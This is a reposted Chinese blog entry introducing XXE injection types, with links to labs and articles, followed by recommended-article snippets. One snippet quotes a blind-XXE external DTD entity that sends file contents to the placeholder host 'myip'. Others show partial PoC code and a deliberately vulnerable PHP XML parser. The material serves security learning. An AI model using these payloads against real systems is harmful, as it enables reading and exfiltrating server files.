XXE 漏洞基本的了解

最新推荐文章于 2024-04-12 11:40:16 发布

weixin_30916125

最新推荐文章于 2024-04-12 11:40:16 发布

阅读量730

点赞数

原文链接：http://www.cnblogs.com/H-hy/p/11581357.html

版权

XXE 注入

在开始之前，先认识一下，最常见的XXE漏洞类型，这样有助于攻击并创造最终正确的 POC：

　　1.基础的 XXE 注入——外部实体注入本地 DTD。

　　2.基于盲注的 XXE 注入—— XML 解析器在响应中不显示任何错误。

　　3.基于错误的 XXE 注入——成功解析之后，XML 解析器始终显示 SAME 响应。即“你的消息已被接收”，因此，我们可能希望解析器将文件的内容打印到错误响应中。

XXE是一个非常强大的攻击，它允许我们操纵错误的XML解析器并利用它们。请注意，有更多的技术和攻击利用方式可以通过XXE注入完成。如前所述，每个解析器都有不同的能力，因此我们可以提出不同的漏洞；；

看了一张相关的文章所以知道了 XXE 漏洞攻击；

https://www.secpulse.com/archives/58915.html

还有一个下载的实验；https://appsec-labs.com/portal/wp-content/uploads/2016/09/XXE-demo-try-it-onyourself.rar

这个文章有一个原文链接：https://appsec-labs.com/portal/xxe-attacking-guide/

看了几个 XXE 漏洞很多文章都是在2016 2017 的；过后做一下这个 XXE 漏洞实验；

看了一个内网大杀器利用：CVE - 2019 - 1024 漏洞

链接如下：

https://msd.misuland.com/pd/3255817997595445898

学习一下

转载于:https://www.cnblogs.com/H-hy/p/11581357.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_30916125

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

【Java代码审计】XXE漏洞

大河之犬的博客

04-02

1624

XXE 漏洞的原理主要是利用了 XML 解析器的实体引用特性。在 XML 中，可以使用实体引用来引用外部的实体，例如文件，以便在 XML 文档中重用内容。然而，如果 XML 解析器未经适当配置，可能会导致外部实体的任意读取和执行，从而引发安全漏洞。攻击者可以构造恶意的 XML 文件，其中包含对外部实体的引用，并通过将这个 XML 文件提交给目标应用程序来触发漏洞。当目标应用程序解析这个 XML 文件时，解析器会尝试读取和解析外部实体，从而使得攻击者能够访问本地或远程系统上的文件，并执行相关操作。

XXE漏洞（2）漏洞实战

jelly

07-07

2370

本次测试XXE主要在靶机上安装了bWAPP程序，中间有一关为XXE漏洞很好做测试了解XXE漏洞。靶机：192.168.56.101 攻击机kali：192.168.56.1 目录了解XXE漏洞原理漏洞成因怎么判断网站是否存在XXE漏洞基本利用 XML漏洞利用任意文件读取有回显的xxe利用读取特殊符号文件没有回显读取文档的方式内网探测 DDOS攻击 XXE漏洞防御了解XXE漏洞原理漏洞成因 XXE漏洞全称XML External Entity ...

参与评论您还未登录，请先登录后发表或查看评论

XXE注入

a3320315的博客

10-28

614

0x01 贴出源地址 Blind XXE详解与Google CTF一道题分析 0x02 贴出常用payload 一、Blind XXE 1、外部DTD （1）先在自己的服务器中加入下列DTD文件 xml.dtd <!ENTITY % start "<!ENTITY % send SYSTEM 'http://myip:10001/?%file;'>"...

Poc初探之XXE

04-18

562

用bwapp的例子简单回顾下xxe漏洞：通过在xml外部实体附带非法参数，实现非法操作。如下图： POC编写思路：针对漏洞页面，发送带相应非法参数的包。人生苦短，下面用Python 的urllib2模块演示。 1 #! /usr/bin/python 2 # coding=utf-8 3 # __author__='Dou—wei' ...

PortSwigger Academy | XML external entity (XXE) injection : XML外部实体注入

水榭山寺花烂漫，凤凰集外雁归来。敢与云峰争秀色，妙雨莲花九重开。

02-01

1593

文章目录什么是XML外部实体注入？XXE漏洞如何产生？XML实体什么是XML？什么是XML实体？什么是文件类型定义？什么是XML自定义实体？什么是XML外部实体？XXE攻击有哪些类型？在本节中，我们将解释什么是XML外部实体注入，描述一些常见的示例，解释如何发现和利用各种XXE注入，并总结如何防止XXE注入攻击。什么是XML外部实体注入？ XML外部实体注入（也称为XXE）是一个网络安全漏洞，它使攻击者能够干扰应用程序对XML数据的处理。它通常使攻击者可以查看应用程序服务器文件系统上的文件，并与应用程

XXE blind 简单poc & 读文件

3569

03-27

3334

原理简介： https://blog.youkuaiyun.com/u011721501/article/details/43775691 首先你要确定是xml格式的数据，content-type是xml，PHP和JAVA利用有点不一样 PHP 利用方式读取文件POC 利用：自己vps放置 xxe.xml <!ENTITY % payload SYSTEM "php://fil...

对xxe漏洞靶机编写poc和exp

rlenew的博客

11-25

1212

主机地址：172.16.131.85 靶机地址：192.168.6.211 （这里不再对xxe漏洞进行讲解，自行百度。主要分为两类有回显xxe和无回显xxe）直接访问靶机地址利用dirb扫描得到了xxe和admin.php页面，访问xxe 抓包进行测试因为已经是xxe靶机了，所以直接开始编写poc代码。poc的主要代码段为 def poc(url): payload = '<?xml version="1.0" encoding="UTF-8"?>\n' payload

第四节 XXE漏洞利用 - 任意文件读取-01

09-15

在开始学习XXE漏洞利用之前，我们需要了解基本的测试代码。下面是一个简单的PHP测试代码： ```php $xml=file_get_contents("php://input"); $data = simplexml_load_string($xml) ; echo "<pre>" ; print_r($data)...

java 漏洞挖掘_Java XXE漏洞典型场景分析

weixin_36415835的博客

02-16

1096

本文首发于oppo安全应急响应中心：0x01 前言：XML 的解析过程中若存在外部实体，若不添加安全的XML解析配置，则XML文档将包含来自外部 URI 的数据。这一行为将导致XML External Entity (XXE) 攻击，从而用于拒绝服务攻击，任意文件读取，扫内网扫描。以前对xxe的认识多停留在php中，从代码层面而言，其形成原因及防护措施较为单一，而java中依赖于其丰富的库，导致解...

WEB漏洞——XXE

qq_63594215的博客

04-12

1464

本次文章主要介绍XXE漏洞的原理，利用以及防御的过程，另外还有介绍一点XML的基础知识，详情请见下文。a) xml，eXtensible Markup Language，可扩展标记语言，是一种标记语言，使用简单标记描述数据b) xml是一种非常灵活的语言，没有固定的标签，所有标签都可以自定义c) 通常，xml被用于信息的传递和记录，因此，xml经常被用于充当配置文件如果把HTML和XML进行对比的话，HTML进行对比的话，HTML旨在显示数据信息，而XML旨在用来进行数据的传输和存储。

XXE-实体注入

Keepb1ue的博客

06-11

4378

XXE介绍 XXE即外部实体，从安全角度理解为XML外部实体注入攻击 XML用于标记电子文件使其具有结构性的标记语言，可以用来标记数据、定义数据类型，是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义（可选）、文档元素。文档类型定义（DTD）可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。 DTD 可被成行地声明于 XML 文档中，也可作为一个外部引用。内部DTD声明: <!DOCTYPE 根元素 [元素声明]> 实

安全测试 - 第二课之XXE 漏洞

撒忆雨

07-23

490

英文简称：XXE 英文全称：XML Extension Entity Injection 中文全称：XML 外部实体注入 XML是⼀种⾮常流⾏的标记语⾔。它⽤于配置⽂件，⽂档格式（如OOXML，ODF，PDF，RSS，…），图像格式（SVG， EXIF标题）和⽹络协议（WebDAV，CalDAV，XMLRPC，SOAP，XMPP，SAML， XACML，…）常⻅的xml注⼊攻击如下所示：攻击原理主要是：在解析外部实体的过程中，XML解析器可以根据URL中指定的⽅案（协议）来查询各种⽹络协议和服务（D

CTF--web学习

qq_45655136的博客

01-08

8635

这是大二上学期主要学习的一些知识，分享一下一、linux常见命令 Linux切换到超级管理员 sudo su 切换到普通用户 su username touch创建文件 mkdir创建文件夹 mkdir -p ./aaa/bbb/ccc创建aaa/bbb/ccc目录 mv 既可以重命名，又可以移动文件或文件夹 rm -r就是向下递归，不管有多少级目录，一并删除 -f就是直接删除，不作任何提示的 cp拷贝 pwd查看当前目录 ‘>’ '>>'将命令执行结果重定向

深入理解漏洞之 XXE 漏洞

weixin_50464560的博客

05-16

1285

介绍 XXE 之前，我先来说一下普通的 XML 注入，这个的利用面比较狭窄，如果有的话应该也是逻辑漏洞如图所示：既然能插入 XML 代码，那我们肯定不能善罢甘休，我们需要更多，于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入，从名字就能看出来，这是一个注入漏洞，注入的是什么？XML外部实体。(看到这里肯定有人要说：你这不是在废话)，固然，其实我这里废话只是想强调我们的利用点是外部实体，也是提醒读者将注意力集中于外部实体中，而不要

XML 是什么

笔记

02-19

280

一、初识XML: 1.基本概念: XML 的英文全称为：Extensible Markup Language 可扩展标记语言可扩展:标签都是自定义的。 *功能 *存储数据， 1.配置文件 2.在网络中传输 * xml与html的区别 1. xml标签都是自定义的，html 标签是预定义。 2. xml的语法严格，html 语法松散 3. xml是存储数据的，html是展示数据 w3C ...

初识XXE漏洞